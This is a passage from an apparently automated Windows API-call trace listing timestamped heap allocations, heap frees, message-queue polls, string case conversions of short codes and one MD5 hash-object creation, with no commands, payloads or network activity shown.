hHeap=0x25c0000) returned 1 [0199.334] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0199.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0199.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.335] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0199.335] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0199.335] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0199.336] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.336] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0199.336] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.337] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0199.337] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.337] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.337] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0199.337] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.338] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0199.338] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.338] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.338] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.338] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.338] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0199.338] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.338] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0199.338] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.338] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.339] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0199.339] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0199.339] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.339] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.339] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.339] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.339] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.339] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0199.340] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.340] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.340] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.340] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.341] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.341] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.342] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0199.342] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0199.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0199.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.343] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0199.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.343] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.343] 